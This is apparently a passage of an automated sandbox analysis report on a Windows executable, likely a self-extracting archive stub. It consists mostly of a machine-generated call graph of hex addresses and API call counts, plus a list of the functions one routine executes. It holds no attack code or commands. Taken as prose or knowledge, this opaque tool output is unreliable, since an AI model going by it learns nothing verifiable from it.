637c0d 42067->42341 42069 63d051 23 API calls 42076 63885d 42069->42076 42070->41991 42071 63898b 42356 632021 23 API calls 42071->42356 42072 638a5f 42077 638ab6 42072->42077 42091 638a6a 42072->42091 42073 638992 42073->42072 42079 6389e1 42073->42079 42076->42069 42076->42070 42076->42071 42076->42073 42354 638117 24 API calls 42076->42354 42355 632021 23 API calls 42076->42355 42084 638a4c 42077->42084 42359 637fc0 32 API calls 42077->42359 42078 638ab4 42085 63959a 25 API calls 42078->42085 42081 638b14 42079->42081 42079->42084 42086 63a231 2 API calls 42079->42086 42080 639105 42083 63959a 25 API calls 42080->42083 42081->42080 42099 638b82 42081->42099 42360 6398bc 42081->42360 42083->42070 42084->42078 42084->42081 42085->42070 42087 638a19 42086->42087 42087->42084 42357 6392a3 32 API calls 42087->42357 42089 63ab1a UnhandledExceptionFilter 42092 638bd1 42089->42092 42091->42078 42358 637db2 32 API calls 42091->42358 42093 63ab1a UnhandledExceptionFilter 42092->42093 42112 638be7 42093->42112 42097 638b70 42364 636e98 23 API calls 42097->42364 42099->42089 42100 638cbc 42101 638e40 42100->42101 42102 638d18 42100->42102 42105 638e52 42101->42105 42106 638e66 42101->42106 42125 638d49 42101->42125 42103 638d8a 42102->42103 42104 638d28 42102->42104 42110 638167 2 API calls 42103->42110 42107 638d6e 42104->42107 42114 638d37 42104->42114 42108 639215 27 API calls 42105->42108 42109 643377 26 API calls 42106->42109 42107->42125 42367 6377b8 33 API calls 42107->42367 42108->42125 42111 638e7f 42109->42111 42115 638dbd 42110->42115 42370 643020 27 API calls 42111->42370 42112->42100 42113 638c93 42112->42113 42119 63981a 24 API calls 42112->42119 42113->42100 42365 639a3c 26 API calls 42113->42365 42366 632021 23 API calls 42114->42366 42121 638de6 42115->42121 42122 638df5 42115->42122 42115->42125 42119->42113 42368 637542 27 API calls 42121->42368 42369 639155 28 API calls __EH_prolog 42122->42369 42128 638f85 42125->42128 42371 632021 23 API calls 42125->42371 42127 639090 42127->42080 42130 63a4ed SetFileAttributesW 42127->42130 42128->42080 42128->42127 42129 63903e 42128->42129 42347 639f09 SetEndOfFile 42128->42347 42348 639da2 42129->42348 42133 6390eb 42130->42133 42133->42080 42372 632021 23 API calls 42133->42372 42134 639085 42136 639620 24 API calls 42134->42136 42136->42127 42137 6390fb 42373 636dcb 23 API calls _wcschr 42137->42373 42140 6316a4 42139->42140 42389 63cee1 42140->42389 42149 639f59 42148->42149 42151 639f63 42149->42151 42397 636d0c 23 API calls 42149->42397 42151->41978 42153 63b50f __EH_prolog 42152->42153 42158 63f1d0 23 API calls 42153->42158 42155 63b521 42159 63b61e 42155->42159 42158->42155 42160 63b630 _abort 42159->42160 42163 6410dc 42160->42163 42166 64109e 42163->42166 42167 6410b1 42166->42167 42170 4ff6859 NtQueryInformationProcess GetSystemInfo 42167->42170 42168 63b597 42168->42008 42170->42168 42184 631732 42171->42184 42173 6313d6 42174 639e80 42173->42174 42175 639e92 42174->42175 42176 639ea5 42174->42176 42177 639eb0 42175->42177 42199 636d5b 23 API calls 42175->42199 42176->42177 42179 639eb8 SetFilePointer 42176->42179 42177->42023 42179->42177 42180 639ed4 42179->42180 42180->42177 42200 636d5b 23 API calls 42180->42200 42182->42026 42183->42021 42185 631748 42184->42185 42194 6317a0 __InternalCxxFrameHandler 42184->42194 42186 631771 42185->42186 42195 636c36 23 API calls __vswprintf_c_l 42185->42195 42190 63178d ___std_exception_copy 42186->42190 42191 6317c7 42186->42191 42188 631767 42196 636ca7 23 API calls 42188->42196 42190->42194 42197 636ca7 23 API calls 42190->42197 42191->42194 42198 636ca7 23 API calls 42191->42198 42194->42173 42195->42188 42196->42186 42197->42194 42198->42194 42199->42176 42200->42177 42202 63cf4d 42201->42202 42204 63cf54 42201->42204 42205 63981a 42202->42205 42204->42031 42206 639833 42205->42206 42208 639e80 24 API calls 42206->42208 42207 639865 42207->42204 42208->42207 42210 64de78 42209->42210 42211 63e617 7 API calls 42210->42211 42212 64de9b 42211->42212 42213 634092 _swprintf 5 API calls 42212->42213 42214 64dead 42213->42214 42215 64d4d4 16 API calls 42214->42215 42216 641b7c 42215->42216 42216->41986 42218 6319bb 42217->42218 42219 6319bf 42217->42219 42218->42038 42221 6318f6 42219->42221 42222 631945 42221->42222 42223 631908 42221->42223 42229 633fa3 42222->42229 42224 633b2d 25 API calls 42223->42224 42227 631928 42224->42227 42227->42218 42230 633fac 42229->42230 42231 633b2d 25 API calls 42230->42231 42232 631966 42230->42232 42231->42230 42232->42227 42233 631e50 42232->42233 42234 631e5a __EH_prolog 42233->42234 42243 633bba 42234->42243 42236 631e84 42237 631732 23 API calls 42236->42237 42240 631f0b 42236->42240 42238 631e9b 42237->42238 42271 6318a9 23 API calls 42238->42271 42240->42227 42241 631eb3 _wcslen 42272 6318a9 23 API calls 42241->42272 42244 633bc4 __EH_prolog 42243->42244 42245 633bf6 42244->42245 42246 633bda 42244->42246 42247 633e51 42245->42247 42251 633c22 42245->42251 42296 63138b 23 API calls 42246->42296 42311 63138b 23 API calls 42247->42311 42250 633be5 42250->42236 42251->42250 42273 643377 42251->42273 42253 633ca3 42254 633d2e 42253->42254 42270 633c9a 42253->42270 42299 63d051 42253->42299 42283 63ab1a 42254->42283 42255 633c9f 42255->42253 42298 6320bd 23 API calls 42255->42298 42257 633c71 42257->42253 42257->42255 42258 633c8f 42257->42258 42297 63138b 23 API calls 42258->42297 42262 633d41 42264 633dd7 42262->42264 42265 633dc7 42262->42265 42305 643020 27 API calls 42264->42305 42287 639215 42265->42287 42268 633dd5 42268->42270 42306 632021 23 API calls 42268->42306 42307 642297 42270->42307 42271->42241 42272->42240 42274 64338c 42273->42274 42276 643396 ___std_exception_copy 42273->42276 42312 636ca7 23 API calls 42274->42312 42277 64341c 42276->42277 42280 643440 _abort 42276->42280 42281 6434c6 _com_raise_error 42276->42281 42313 6432aa 26 API calls 3 library calls 42277->42313 42280->42257 42282 643524 42281->42282 42314 643106 26 API calls 42281->42314 42282->42257 42284 63ab28 42283->42284 42286 63ab32 42283->42286 42285 64eb38 UnhandledExceptionFilter 42284->42285 42285->42286 42286->42262 42288 63921f __EH_prolog 42287->42288 42289 6313ba 23 API calls 42288->42289 42290 639231 42289->42290 42315 63d114 42290->42315 42292 63928a 42292->42268 42294 63d114 26 API calls 42295 639243 42294->42295 42295->42292 42295->42294 42322 63d300 24 API calls __InternalCxxFrameHandler 42295->42322 42296->42250 42297->42270 42298->42253 42300 63d072 42299->42300 42301 63d084 42299->42301 42323 63603a 23 API calls 42300->42323 42324 63603a 23 API calls 42301->42324 42304 63d07c 42304->42254 42305->42268 42306->42270 42308 6422a1 42307->42308 42310 6422c1 42308->42310 42325 640eed 23 API calls 42308->42325 42311->42250 42312->42276 42313->42280 42314->42281 42319 63d12a __InternalCxxFrameHandler 42315->42319 42316 63d29a 42317 63d0cb 6 API calls 42316->42317 42320 63d291 42316->42320 42317->42320 42318 648c8d 25 API calls 42318->42319 42319->42316 42319->42318 42319->42320 42321 63ac05 23 API calls 42319->42321 42320->42295 42321->42319 42322->42295 42323->42304 42324->42304 42325->42310 42326->42048 42327->42048 42328->42045 42330 635d2a 42329->42330 42374 635c4b 42330->42374 42333 635d5d 42334 635d95 42333->42334 42379 63b1dc CharUpperW ___vcrt_FlsSetValue _wcslen 42333->42379 42334->42062 42336 638186 42335->42336 42337 638232 42336->42337 42386 63be5e CharUpperW UnhandledExceptionFilter __InternalCxxFrameHandler 42336->42386 42385 641fac CharUpperW 42337->42385 42340 63823b 42340->42065 42342 637c22 42341->42342 42343 637c5a 42342->42343 42387 636e7a 23 API calls 42342->42387 42343->42076 42345 637c52 42388 63138b 23 API calls 42345->42388 42347->42129 42349 639db3 42348->42349 42350 639e3f SetFileTime 42349->42350 42350->42134 42351->42057 42352->42070 42353->42070 42354->42076 42355->42076 42356->42073 42357->42084 42358->42078 42359->42084 42361 638b5a 42360->42361 42362 6398c5 GetFileType 42360->42362 42361->42099 42363 632021 23 API calls 42361->42363 42362->42361 42363->42097 42364->42099 42365->42100 42366->42125 42367->42125 42368->42125 42369->42125 42370->42125 42371->42128 42372->42137 42373->42080 42380 635b48 42374->42380 42377 635c6c 42377->42333 42378 635b48 CharUpperW 42378->42377 42379->42333 42383 635b52 42380->42383 42381 635c3a 42381->42377 42381->42378 42383->42381 42384 63b1dc CharUpperW ___vcrt_FlsSetValue _wcslen 42383->42384 42384->42383 42385->42340 42386->42337 42387->42345 42388->42343 42393 63cef2 42389->42393 42391 63cf24 42396 63a99e 23 API calls 42391->42396 42395 63a99e 23 API calls 42393->42395 42394 63cf2f 42395->42391 42396->42394 42397->42151 42399 63a6a8 42398->42399 42400 63a6c1 FindFirstFileW 42399->42400 42403 63a6fe 42399->42403 42401 63a6d0 42400->42401 42400->42403 42402 63a6e4 FindFirstFileW 42401->42402 42401->42403 42402->42403 42403->41998 42412 64a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 42404->42412 42406 64a5cd 42407 64a5d9 42406->42407 42413 64a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 42406->42413 42407->41713 42407->41714 42409->41722 42410->41722 42411->41725 42412->42406 42413->42407 42415 639f42 23 API calls 42414->42415 42416 631fe8 42415->42416 42417 632005 42416->42417 42418 631a04 25 API calls 42416->42418 42417->41740 42417->41741 42419 631ff5 42418->42419 42419->42417 42421 63138b 23 API calls 42419->42421 42421->42417 42423 64b583 GetMessageW 42422->42423 42424 64b5bc GetDlgItem 42422->42424 42425 64b5a8 TranslateMessage DispatchMessageW 42423->42425 42426 64b599 IsDialogMessageW 42423->42426 42424->41751 42424->41752 42425->42424 42426->42424 42426->42425 42448 6598f0 42456 65adaf 42448->42456 42451 659904 42454 659919 42457 65add6 __dosmaperr 42456->42457 42458 64fbbc CatchGuardHandler UnhandledExceptionFilter 42457->42458 42459 6598fa 42458->42459 42459->42451 42460 659869 42459->42460 42461 659874 42460->42461 42462 659888 42461->42462 42476 65ae5b UnhandledExceptionFilter CatchGuardHandler __dosmaperr 42461->42476 42463 65b136 __dosmaperr 2 API calls 42462->42463 42470 6598a8 42462->42470 42465 65989a 42463->42465 42466 6598a2 42465->42466 42477 65aeb1 UnhandledExceptionFilter CatchGuardHandler __dosmaperr 42465->42477 42468 658dcc _free 2 API calls 42466->42468 42468->42470 42469 6598b7 42469->42466 42471 6598be 42469->42471 42470->42454 42475 659920 UnhandledExceptionFilter 42470->42475 42478 659649 UnhandledExceptionFilter RtlFreeHeap __dosmaperr 42471->42478 42473 6598c9 42474 658dcc _free 2 API calls 42473->42474 42474->42470 42475->42451 42476->42462 42477->42469 42478->42473 42479 65bb30 42480 65bb39 42479->42480 42481 65bb42 42479->42481 42483 65ba27 42480->42483 42484 6597e5 _unexpected 5 API calls 42483->42484 42485 65ba34 42484->42485 42503 65bb4e 42485->42503 42487 65ba3c 42510 65b7bb 42487->42510 42490 65ba53 42490->42481 42493 65ba96 42495 658dcc _free 2 API calls 42493->42495 42495->42490 42497 65ba91 42526 6591a8 UnhandledExceptionFilter RtlFreeHeap __dosmaperr 42497->42526 42499 65bada 42499->42493 42527 65b691 UnhandledExceptionFilter RtlFreeHeap UnhandledExceptionFilter 42499->42527 42500 65baae 42500->42499 42501 658dcc _free 2 API calls 42500->42501 42501->42499 42504 65bb5a ___scrt_is_nonwritable_in_current_image 42503->42504 42505 6597e5 _unexpected 5 API calls 42504->42505 42506 65bb64 __cftof _abort 42505->42506 42507 65bbe8 _abort 42506->42507 42509 658dcc _free 2 API calls 42506->42509 42528 658d24 5 API calls _abort 42506->42528 42507->42487 42509->42506 42511 654636 __cftof 5 API calls 42510->42511 42512 65b7cd 42511->42512 42512->42490 42513 658e06 42512->42513 42514 658e44 42513->42514 42515 658e14 __dosmaperr 42513->42515 42530 6591a8 UnhandledExceptionFilter RtlFreeHeap __dosmaperr 42514->42530 42515->42514 42517 658e42 42515->42517 42529 657a5e UnhandledExceptionFilter CatchGuardHandler __dosmaperr 42515->42529 42517->42493 42519 65bbf0 42517->42519 42520 65b7bb 5 API calls 42519->42520 42525 65bc0f _abort 42520->42525 42521 64fbbc CatchGuardHandler UnhandledExceptionFilter 42522 65ba89 42521->42522 42522->42497 42522->42500 42523 65bc16 42523->42521 42525->42523 42531 65b893 42525->42531 42526->42493 42527->42493 42529->42515 42530->42517 42533 65b8be 42531->42533 42540 65b977 42533->42540 42541 65c988 42533->42541 42535 64fbbc CatchGuardHandler UnhandledExceptionFilter 42537 65ba23 42535->42537 42537->42523 42539 65ab78 __vswprintf_c_l 5 API calls 42539->42540 42540->42535 42542 654636 __cftof 5 API calls 42541->42542 42543 65c9a8 42542->42543 42544 65ca7e 42543->42544 42546 658e06 __vswprintf_c_l 2 API calls 42543->42546 42549 65ca07 _abort __vsnwprintf_l 42543->42549 42545 64fbbc CatchGuardHandler UnhandledExceptionFilter 42544->42545 42547 65b92e 42545->42547 42546->42549 42550 65ab78 42547->42550 42555 65abc3 UnhandledExceptionFilter RtlFreeHeap _free 42549->42555 42551 654636 __cftof 5 API calls 42550->42551 42552 65ab8b 42551->42552 42556 65a95b 42552->42556 42555->42544 42557 65a976 __vswprintf_c_l 42556->42557 42559 65a9e7 __vsnwprintf_l 42557->42559 42561 658e06 __vswprintf_c_l 2 API calls 42557->42561 42563 65ab50 42557->42563 42558 64fbbc CatchGuardHandler UnhandledExceptionFilter 42560 65ab63 42558->42560 42574 65aa9c 42559->42574 42578 65af6c 42559->42578 42560->42539 42561->42559 42563->42558 42566 65aa73 42568 65af6c __vswprintf_c_l UnhandledExceptionFilter 42566->42568 42566->42574 42567 65aaab 42570 658e06 __vswprintf_c_l 2 API calls 42567->42570 42573 65aacc __vsnwprintf_l 42567->42573 42568->42574 42569 65ab41 42584 65abc3 UnhandledExceptionFilter RtlFreeHeap _free 42569->42584 42570->42573 42571 65af6c __vswprintf_c_l UnhandledExceptionFilter 42575 65ab20 42571->42575 42573->42569 42573->42571 42585 65abc3 UnhandledExceptionFilter RtlFreeHeap _free 42574->42585 42575->42569 42576 65ab6f 42575->42576 42586 65abc3 UnhandledExceptionFilter RtlFreeHeap _free 42576->42586 42579 65af93 __dosmaperr 42578->42579 42581 65af9c 42579->42581 42587 65aff4 UnhandledExceptionFilter CatchGuardHandler __dosmaperr __vswprintf_c_l 42579->42587 42582 64fbbc CatchGuardHandler UnhandledExceptionFilter 42581->42582 42583 65aa60 42582->42583 42583->42566 42583->42567 42583->42574 42584->42574 42585->42563 42586->42574 42587->42581 42588 65abf0 42589 65abfb 42588->42589 42591 65ac20 42589->42591 42592 65af0a 42589->42592 42593 65af31 __dosmaperr 42592->42593 42594 64fbbc CatchGuardHandler UnhandledExceptionFilter 42593->42594 42595 65af66 42594->42595 42595->42589 42427 64dec2 42428 64decf 42427->42428 42429 63e617 7 API calls 42428->42429 42430 64dedc 42429->42430 42431 634092 _swprintf 5 API calls 42430->42431 42432 64def1 SetDlgItemTextW 42431->42432 42433 64b568 5 API calls 42432->42433 42434 64df0e 42433->42434 42596 64f3b2 42597 64f3be ___scrt_is_nonwritable_in_current_image 42596->42597 42624 64eed7 42597->42624 42599 64f3c5 42600 64f518 42599->42600 42603 64f3ef 42599->42603 42676 64f838 UnhandledExceptionFilter _abort 42600->42676 42602 64f51f 42670 657f58 42602->42670 42612 64f42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 42603->42612 42628 658aed 42603->42628 42613 64f48f 42612->42613 42673 657af4 5 API calls 3 library calls 42612->42673 42636 658a3e UnhandledExceptionFilter GetPEB RtlFreeHeap UnhandledExceptionFilter RtlExitUserProcess 42613->42636 42615 64f49d 42637 64df1e 42615->42637 42618 64f4aa 42618->42602 42619 64f4b5 42618->42619 42620 64f4be 42619->42620 42674 657efb UnhandledExceptionFilter GetPEB RtlFreeHeap RtlExitUserProcess _abort 42619->42674 42675 64f048 UnhandledExceptionFilter ___scrt_uninitialize_crt 42620->42675 42623 64f40e 42625 64eee0 42624->42625 42627 64eef5 ___scrt_uninitialize_crt 42625->42627 42678 658977 42625->42678 42627->42599 42629 658b04 42628->42629 42630 64fbbc CatchGuardHandler UnhandledExceptionFilter 42629->42630 42631 64f408 42630->42631 42631->42623 42632 658a91 42631->42632 42633 658ac0 42632->42633 42634 64fbbc CatchGuardHandler UnhandledExceptionFilter 42633->42634 42635 658ae9 42634->42635 42635->42612 42636->42615 42685 640863 42637->42685 42639 64df2e 42700 64ac16 42639->42700 42641 64df46 _abort 42648 64dfbc 42641->42648 42705 64c5c4 42641->42705 42644 64dfe0 42710 64dbde 42644->42710 42646 634092 _swprintf 5 API calls 42647 64e04d LoadIconW 42646->42647 42714 64b6dd LoadBitmapW 42647->42714 42648->42646 42649 64df76 __InternalCxxFrameHandler 42649->42648 42650 64dbde SetEnvironmentVariableW 42649->42650 42650->42648 42655 64e098 42736 6490b7 42655->42736 42658 6490b7 UnhandledExceptionFilter 42659 64e0aa DialogBoxParamW 42658->42659 42660 64e0e4 42659->42660 42662 64e10b 42660->42662 42742 64ae2f SetCurrentDirectoryW _abort _wcslen 42660->42742 42663 64e12a DeleteObject 42662->42663 42664 64e146 42663->42664 42665 64e13f DeleteObject 42663->42665 42666 64e17d 42664->42666 42743 64dc3b PeekMessageW GetMessageW TranslateMessage DispatchMessageW 42664->42743 42665->42664 42739 64ac7c 42666->42739 42669 64e1c3 42669->42618 42834 657cd5 42670->42834 42673->42613 42674->42620 42675->42623 42676->42602 42681 65c05a 42678->42681 42684 65c073 42681->42684 42682 64fbbc CatchGuardHandler UnhandledExceptionFilter 42683 658986 42682->42683 42683->42627 42684->42682 42687 64086d 42685->42687 42688 640b54 42687->42688 42744 6575fb 5 API calls 2 library calls 42687->42744 42689 640c94 GetFileAttributesW 42688->42689 42690 640cac 42688->42690 42689->42688 42689->42690 42691 640d73 42690->42691 42693 640d0d 42690->42693 42699 640d5e _wcslen 42690->42699 42692 634092 _swprintf 5 API calls 42691->42692 42692->42699 42694 63e617 7 API calls 42693->42694 42695 640d3c 42694->42695 42696 634092 _swprintf 5 API calls 42695->42696 42697 640d4f 42696->42697 42698 63e617 7 API calls 42697->42698 42698->42699 42699->42639 42745 64081b 42700->42745 42702 64ac2a OleInitialize 42703 64ac4d 42702->42703 42704 64ac6b SHGetMalloc 42703->42704 42704->42641 42709 64c5ce 42705->42709 42706 64c6e4 42706->42644 42706->42649 42707 641fac CharUpperW 42707->42709 42709->42706 42709->42707 42747 63f3fa 23 API calls 2 library calls 42709->42747 42712 64dbeb 42710->42712 42711 64dc36 42711->42648 42712->42711 42713 64dc2a SetEnvironmentVariableW 42712->42713 42713->42711 42715 64b6fe 42714->42715 42716 64b70b GetObjectW 42714->42716 42748 64a6c2 42715->42748 42720 64b71a 42716->42720 42718 64b705 42718->42716 42718->42720 42719 64a5c6 4 API calls 42721 64b72d 42719->42721 42720->42719 42722 64b770 42721->42722 42723 64b74c 42721->42723 42724 64a6c2 2 API calls 42721->42724 42733 63da42 42722->42733 42754 64a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 42723->42754 42726 64b73d 42724->42726 42726->42723 42728 64b743 DeleteObject 42726->42728 42727 64b754 42755 64a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 42727->42755 42728->42723 42730 64b75d 42756 64a80c 8 API calls 42730->42756 42732 64b764 DeleteObject 42732->42722 42759 63da67 42733->42759 42735 63da4e 42735->42655 42737 64eb38 UnhandledExceptionFilter 42736->42737 42738 6490d6 42737->42738 42738->42658 42740 64acab 42739->42740 42741 64acb5 CoUninitialize 42740->42741 42741->42669 42742->42662 42743->42666 42744->42688 42746 640828 42745->42746 42746->42702 42747->42709 42749 64a6db __InternalCxxFrameHandler 42748->42749 42750 64a754 CreateStreamOnHGlobal 42749->42750 42753 64a776 42749->42753 42751 64a76c 42750->42751 42750->42753 42757 64a626 739A6BB0 42751->42757 42753->42718 42754->42727 42755->42730 42756->42732 42758 64a638 42757->42758 42758->42753 42760 63da75 _wcschr __EH_prolog 42759->42760 42797 6398e0 42760->42797 42762 63959a 25 API calls 42764 63e24d 42762->42764 42763 63db31 42801 656310 42763->42801 42764->42735 42766 63db05 42766->42763 42768 63e261 23 API calls 42766->42768 42778 63dd4a 42766->42778 42767 63db44 42769 656310 3 API calls 42767->42769 42768->42766 42777 63db56 ___vcrt_FlsSetValue 42769->42777 42770 63dc85 42770->42778 42821 639d70 25 API calls 42770->42821 42772 639e80 24 API calls 42772->42777 42774 63dc9f ___std_exception_copy 42775 639bd0 25 API calls 42774->42775 42774->42778 42794 63dcc8 ___vcrt_FlsSetValue _wcslen ___std_exception_copy 42775->42794 42777->42770 42777->42772 42777->42778 42815 639bd0 42777->42815 42820 639d70 25 API calls 42777->42820 42778->42762 42779 63e159 42784 63e1de 42779->42784 42827 658cce UnhandledExceptionFilter RtlFreeHeap UnhandledExceptionFilter ___std_exception_copy 42779->42827 42781 63e16e 42828 657625 UnhandledExceptionFilter RtlFreeHeap UnhandledExceptionFilter ___std_exception_copy 42781->42828 42783 63e214 42788 656310 3 API calls 42783->42788 42784->42783 42790 63e261 23 API calls 42784->42790 42786 63e1c6 42829 63e27c 23 API calls 42786->42829 42789 63e22d 42788->42789 42791 656310 3 API calls 42789->42791 42790->42784 42791->42778 42794->42778 42794->42779 42822 63e5b1 5 API calls __vsnprintf 42794->42822 42823 656159 3 API calls 3 library calls 42794->42823 42824 658cce UnhandledExceptionFilter RtlFreeHeap UnhandledExceptionFilter ___std_exception_copy 42794->42824 42825 657625 UnhandledExceptionFilter RtlFreeHeap UnhandledExceptionFilter ___std_exception_copy 42794->42825 42826 63e27c 23 API calls 42794->42826 42798 6398ea 42797->42798 42799 63994b CreateFileW 42798->42799 42800 63996c 42799->42800 42800->42766 42802 656349 42801->42802 42803 65634d 42802->42803 42805 656375 42802->42805 42830 6591a8 UnhandledExceptionFilter RtlFreeHeap __dosmaperr 42803->42830 42807 656699 42805->42807 42832 656230 UnhandledExceptionFilter CatchGuardHandler 42805->42832 42806 656352 42831 659087 UnhandledExceptionFilter RtlFreeHeap UnhandledExceptionFilter ___std_exception_copy 42806->42831 42809 64fbbc CatchGuardHandler UnhandledExceptionFilter 42807->42809 42811 6566a6 42809->42811 42810 65635d 42812 64fbbc CatchGuardHandler UnhandledExceptionFilter 42810->42812 42811->42767 42814 656369 42812->42814 42814->42767 42816 639bdc 42815->42816 42818 639be3 42815->42818 42816->42777 42818->42816 42819 639785 ReadFile GetFileType 42818->42819 42833 636d1a 23 API calls 42818->42833 42819->42818 42820->42777 42821->42774 42822->42794 42823->42794 42824->42794 42825->42794 42826->42794 42827->42781 42828->42786 42829->42784 42830->42806 42831->42810 42832->42805 42833->42818 42835 657ce1 _abort _unexpected 42834->42835 42839 657cf9 _abort 42835->42839 42859 657e73 42835->42859 42836 657d9f _abort 42840 657dbc 42836->42840 42841 657de8 42836->42841 42838 657d76 42842 657d8e 42838->42842 42846 658a91 _abort UnhandledExceptionFilter 42838->42846 42839->42836 42839->42838 42863 6587e0 UnhandledExceptionFilter RtlFreeHeap _abort 42839->42863 42850 657dee 42840->42850 42864 662390 UnhandledExceptionFilter CatchGuardHandler 42841->42864 42847 658a91 _abort UnhandledExceptionFilter 42842->42847 42846->42842 42847->42836 42865 65b076 42850->42865 42853 657e0c 42855 657e73 _abort UnhandledExceptionFilter 42853->42855 42854 657dfc GetPEB 42854->42853 42856 657e24 42855->42856 42869 4ff66f2 RtlExitUserProcess 42856->42869 42862 657e99 42859->42862 42860 64fbbc CatchGuardHandler UnhandledExceptionFilter 42861 657ed9 42860->42861 42861->42839 42862->42860 42863->42838 42866 65b091 __dosmaperr 42865->42866 42867 64fbbc CatchGuardHandler UnhandledExceptionFilter 42866->42867 42868 657df8 42867->42868 42868->42853 42868->42854 42870 657e2e 42869->42870 42871 65bfb3 42872 65bfbe 42871->42872 42873 65bfe6 42872->42873 42874 65bfd7 42872->42874 42875 65bff5 42873->42875 42892 65f20f UnhandledExceptionFilter RtlFreeHeap UnhandledExceptionFilter __dosmaperr ___std_exception_copy 42873->42892 42891 6591a8 UnhandledExceptionFilter RtlFreeHeap __dosmaperr 42874->42891 42880 658e54 42875->42880 42878 65bfdc _abort 42881 658e61 42880->42881 42882 658e6c 42880->42882 42883 658e06 __vswprintf_c_l 2 API calls 42881->42883 42884 658e74 42882->42884 42888 658e7d __dosmaperr 42882->42888 42889 658e69 42883->42889 42885 658dcc _free 2 API calls 42884->42885 42885->42889 42886 658e82 42893 6591a8 UnhandledExceptionFilter RtlFreeHeap __dosmaperr 42886->42893 42888->42886 42888->42889 42894 657a5e UnhandledExceptionFilter CatchGuardHandler __dosmaperr 42888->42894 42889->42878 42891->42878 42892->42875 42893->42889 42894->42888 42895 639a74 42898 639a7e 42895->42898 42896 639b9d SetFilePointer 42897 639ab1 42896->42897 42898->42896 42898->42897 42899 63981a 24 API calls 42898->42899 42900 639b79 42898->42900 42899->42900 42900->42896 42901 639f7a 42902 639f88 42901->42902 42904 639f8f 42901->42904 42903 63a003 WriteFile 42903->42904 42904->42902 42904->42903 42906 63a095 42904->42906 42908 636baa 23 API calls 42904->42908 42909 636e98 23 API calls 42906->42909 42908->42904 42909->42902 42910 82d598 42911 82d5a5 VirtualAlloc 42910->42911 42913 64cd58 42916 64cd7b _wcschr 42913->42916 42915 64d40a 42922 64c793 _abort _wcslen _wcsrchr 42916->42922 42925 64d78f 42916->42925 42917 64ca67 SetWindowTextW 42917->42922 42920 64cc31 GetDlgItem SetWindowTextW SendMessageW 42920->42922 42922->42915 42922->42917 42922->42920 42923 64cc71 SendMessageW 42922->42923 42924 634092 _swprintf 5 API calls 42922->42924 42937 63b991 5 API calls 3 library calls 42922->42937 42938 63a5d1 FindFirstFileW FindFirstFileW 42922->42938 42939 64b48e 23 API calls 2 library calls 42922->42939 42923->42922 42924->42922 42927 64d799 _abort _wcslen 42925->42927 42926 64d9e7 42926->42922 42927->42926 42928 63a231 2 API calls 42927->42928 42933 64d93d 42927->42933 42929 64d8ba 42928->42929 42931 64d8d9 ShellExecuteExW 42929->42931 42930 64d9de ShowWindow 42930->42926 42931->42926 42934 64d8ec 42931->42934 42932 64d925 42940 64dc3b PeekMessageW GetMessageW TranslateMessage DispatchMessageW 42932->42940 42933->42926 42933->42930 42934->42932 42934->42933 42936 64d91b ShowWindow 42934->42936 42936->42932 42937->42922 42938->42922 42939->42922 42940->42933

                                                                                    Executed Functions

                                                                                    Function 0064B7E0 Relevance: 88.2, APIs: 37, Strings: 13, Instructions: 731windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 0064B7E5
                                                                                      • Part of subcall function 00631316: GetDlgItem.USER32(00000000,00003021), ref: 0063135A
                                                                                      • Part of subcall function 00631316: SetWindowTextW.USER32(00000000,006635F4), ref: 00631370
                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0064B8D1
                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0064B8EF
                                                                                    • IsDialogMessageW.USER32(?,?), ref: 0064B902
                                                                                    • TranslateMessage.USER32(?), ref: 0064B910
                                                                                    • DispatchMessageW.USER32(?), ref: 0064B91A
                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0064B93D
                                                                                    • EndDialog.USER32(?,00000001), ref: 0064B960
                                                                                    • GetDlgItem.USER32(?,00000068), ref: 0064B983
                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0064B99E
                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,006635F4), ref: 0064B9B1
                                                                                      • Part of subcall function 0064D453: _wcschr.LIBVCRUNTIME ref: 0064D45C
                                                                                      • Part of subcall function 0064D453: _wcslen.LIBCMT ref: 0064D47D
                                                                                    • SetFocus.USER32(00000000), ref: 0064B9B8
                                                                                    • _swprintf.LIBCMT ref: 0064BA24
                                                                                      • Part of subcall function 00634092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 006340A5
                                                                                      • Part of subcall function 0064D4D4: GetDlgItem.USER32(00000068,0068FCB8), ref: 0064D4E8
                                                                                      • Part of subcall function 0064D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,0064AF07,00000001,?,?,0064B7B9,0066506C,0068FCB8,0068FCB8,00001000,00000000,00000000), ref: 0064D510
                                                                                      • Part of subcall function 0064D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0064D51B
                                                                                      • Part of subcall function 0064D4D4: SendMessageW.USER32(00000000,000000C2,00000000,006635F4), ref: 0064D529
                                                                                      • Part of subcall function 0064D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0064D53F
                                                                                      • Part of subcall function 0064D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0064D559
                                                                                      • Part of subcall function 0064D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0064D59D
                                                                                      • Part of subcall function 0064D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0064D5AB
                                                                                      • Part of subcall function 0064D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0064D5BA
                                                                                      • Part of subcall function 0064D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0064D5E1
                                                                                      • Part of subcall function 0064D4D4: SendMessageW.USER32(00000000,000000C2,00000000,006643F4), ref: 0064D5F0
                                                                                    • _swprintf.LIBCMT ref: 0064BAC2
                                                                                    • _swprintf.LIBCMT ref: 0064BB7C
                                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 0064BC6F
                                                                                    • _swprintf.LIBCMT ref: 0064BD1E
